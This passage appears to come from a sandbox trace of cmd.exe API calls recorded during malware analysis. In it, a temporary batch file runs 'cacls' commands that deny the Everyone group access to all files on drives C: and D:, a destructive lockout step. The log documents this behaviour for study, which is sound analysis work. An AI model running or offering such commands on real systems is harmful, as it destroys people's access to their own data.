-1 [0036.522] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0036.522] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0036.522] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0036.522] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0036.522] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0036.522] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0036.522] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0036.522] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0036.522] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0036.522] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0036.522] SetErrorMode (uMode=0x0) returned 0x0 [0036.522] SetErrorMode (uMode=0x1) returned 0x0 [0036.522] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd1b028, lpFilePart=0xc8ef1c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8ef1c*="Desktop") returned 0x1c [0036.522] SetErrorMode (uMode=0x0) returned 0x1 [0036.522] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.522] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.522] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.522] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.522] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xffffffff [0036.522] GetLastError () returned 0x2 [0036.522] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.523] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xd16938 [0036.523] FindClose (in: hFindFile=0xd16938 | out: hFindFile=0xd16938) returned 1 [0036.523] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xffffffff [0036.523] GetLastError () returned 0x2 [0036.523] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xd16938 [0036.523] FindClose (in: hFindFile=0xd16938 | out: hFindFile=0xd16938) returned 1 [0036.523] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0036.523] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0036.523] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0036.523] SetErrorMode (uMode=0x0) returned 0x0 [0036.523] SetErrorMode (uMode=0x1) returned 0x0 [0036.523] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd1b080, lpFilePart=0xc8ecc4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8ecc4*="Desktop") returned 0x1c [0036.523] SetErrorMode (uMode=0x0) returned 0x1 [0036.523] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.523] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.523] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.523] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.523] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xffffffff [0036.523] GetLastError () returned 0x2 [0036.523] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.523] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xd169a8 [0036.524] FindClose (in: hFindFile=0xd169a8 | out: hFindFile=0xd169a8) returned 1 [0036.524] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xffffffff [0036.524] GetLastError () returned 0x2 [0036.524] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xd169a8 [0036.524] FindClose (in: hFindFile=0xd169a8 | out: hFindFile=0xd169a8) returned 1 [0036.524] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0036.524] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0036.524] GetConsoleTitleW (in: lpConsoleTitle=0xc8ef4c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.524] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ee78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ee5c | out: lpAttributeList=0xc8ee78, lpSize=0xc8ee5c) returned 1 [0036.524] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ee78, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ee64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ee78, lpPreviousValue=0x0) returned 1 [0036.524] GetStartupInfoW (in: lpStartupInfo=0xc8eeb0 | out: lpStartupInfo=0xc8eeb0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0036.524] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0036.524] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0036.524] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0036.524] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0036.524] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.524] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.524] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.524] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0036.524] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0036.524] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0036.524] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0036.524] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0036.524] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0036.524] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0036.525] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0036.525] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0036.525] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0036.525] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0036.525] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0036.525] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.525] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.525] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.525] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.525] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.525] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.525] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.525] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.525] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.525] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0036.525] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0036.525] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0036.525] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0036.525] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0036.525] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0036.525] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0036.525] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.525] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.525] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0036.525] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0036.525] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0036.525] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0036.525] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\*.*\" /e /d everyone", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8ee00*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\*.*\" /e /d everyone", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ee4c | out: lpCommandLine="cacls \"C:\\*.*\" /e /d everyone", lpProcessInformation=0xc8ee4c*(hProcess=0x80, hThread=0x94, dwProcessId=0x8d8, dwThreadId=0x820)) returned 1 [0036.527] CloseHandle (hObject=0x94) returned 1 [0036.528] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0036.528] GetEnvironmentStringsW () returned 0xd1b1e8* [0036.528] FreeEnvironmentStringsA (penv="=") returned 1 [0036.528] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ee78 | out: lpAttributeList=0xc8ee78) [0036.528] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0036.528] _close (_FileHandle=4) returned 0 [0036.528] WaitForSingleObject (hHandle=0x8c, dwMilliseconds=0xffffffff) returned 0x0 [0036.596] GetExitCodeProcess (in: hProcess=0x8c, lpExitCode=0xc8f1c0 | out: lpExitCode=0xc8f1c0*=0x0) returned 1 [0036.596] CloseHandle (hObject=0x8c) returned 1 [0036.596] WaitForSingleObject (hHandle=0x80, dwMilliseconds=0xffffffff) returned 0x0 [0036.598] GetExitCodeProcess (in: hProcess=0x80, lpExitCode=0xc8f1c0 | out: lpExitCode=0xc8f1c0*=0x5) returned 1 [0036.598] CloseHandle (hObject=0x80) returned 1 [0036.598] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.598] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0036.598] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.598] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0036.598] _get_osfhandle (_FileHandle=0) returned 0x24 [0036.598] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0036.598] SetConsoleInputExeNameW () returned 0x1 [0036.598] GetConsoleOutputCP () returned 0x1b5 [0036.599] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.599] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.599] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80 [0036.599] _open_osfhandle (_OSFileHandle=0x80, _Flags=8) returned 3 [0036.599] _get_osfhandle (_FileHandle=3) returned 0x80 [0036.599] SetFilePointer (in: hFile=0x80, lDistanceToMove=1193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0036.599] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0036.599] ReadFile (in: hFile=0x80, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x5c5, lpOverlapped=0x0) returned 1 [0036.599] SetFilePointer (in: hFile=0x80, lDistanceToMove=1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0036.599] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="echo y|cacls \"D:\\*.*\" /e /d everyone\r\n /d everyone\r\nd everyone\r\n\n\r\n=%%i\r\n") returned 38 [0036.599] GetFileType (hFile=0x80) returned 0x1 [0036.599] _get_osfhandle (_FileHandle=3) returned 0x80 [0036.599] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0036.600] _wcsicmp (_String1="echo", _String2=")") returned 60 [0036.600] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0036.600] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0036.600] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0036.600] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0036.600] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0036.600] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0036.600] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0036.600] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0036.600] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0036.600] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0036.600] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0036.600] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0036.600] _tell (_FileHandle=3) returned 1231 [0036.600] _close (_FileHandle=3) returned 0 [0036.600] _pipe (in: _PtHandles=0xd25f30, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0xd25f30) returned 0 [0036.600] _dup (_FileHandle=1) returned 5 [0036.600] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0036.600] _close (_FileHandle=4) returned 0 [0036.600] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0036.600] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0036.600] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0036.600] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0036.600] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0036.600] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0036.600] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0036.600] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0036.600] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0036.600] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0036.600] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0036.600] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0036.600] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0036.600] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0036.600] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0036.600] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0036.600] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0036.601] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0036.601] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0036.601] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0036.601] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0036.601] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0036.601] SetErrorMode (uMode=0x0) returned 0x0 [0036.601] SetErrorMode (uMode=0x1) returned 0x0 [0036.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x208, lpBuffer=0xd17f78, lpFilePart=0xc8ecc4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0xc8ecc4*="system32") returned 0x13 [0036.601] SetErrorMode (uMode=0x0) returned 0x1 [0036.601] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\system32\\.") returned 1 [0036.601] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.601] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.601] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe", fInfoLevelId=0x1, lpFindFileData=0xc8ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea70) returned 0xd18078 [0036.601] FindClose (in: hFindFile=0xd18078 | out: hFindFile=0xd18078) returned 1 [0036.601] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0036.601] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0036.601] GetConsoleTitleW (in: lpConsoleTitle=0xc8ef4c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.601] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ee78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ee5c | out: lpAttributeList=0xc8ee78, lpSize=0xc8ee5c) returned 1 [0036.601] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ee78, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ee64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ee78, lpPreviousValue=0x0) returned 1 [0036.601] GetStartupInfoW (in: lpStartupInfo=0xc8eeb0 | out: lpStartupInfo=0xc8eeb0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0036.601] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0036.601] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0036.601] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0036.601] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0036.601] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.601] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.601] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.601] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0036.602] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0036.602] lstrcmpW (lpString1="\\cmd.exe", lpString2="\\XCOPY.EXE") returned -1 [0036.602] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8ee00*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ee4c | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", lpProcessInformation=0xc8ee4c*(hProcess=0x94, hThread=0x8c, dwProcessId=0xb40, dwThreadId=0xbe8)) returned 1 [0036.606] CloseHandle (hObject=0x8c) returned 1 [0036.606] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0036.606] GetEnvironmentStringsW () returned 0xd1b020* [0036.606] FreeEnvironmentStringsA (penv="=") returned 1 [0036.606] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ee78 | out: lpAttributeList=0xc8ee78) [0036.606] _get_osfhandle (_FileHandle=3) returned 0x80 [0036.606] DuplicateHandle (in: hSourceProcessHandle=0x94, hSourceHandle=0x80, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0036.606] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0036.606] _close (_FileHandle=5) returned 0 [0036.607] _dup (_FileHandle=0) returned 4 [0036.607] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0036.607] _close (_FileHandle=3) returned 0 [0036.607] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0036.607] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0036.607] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0036.607] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0036.607] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0036.607] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0036.607] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0036.607] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0036.607] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0036.607] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0036.607] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0036.607] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0036.607] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0036.607] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0036.607] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0036.607] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0036.607] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0036.607] _wcsicmp 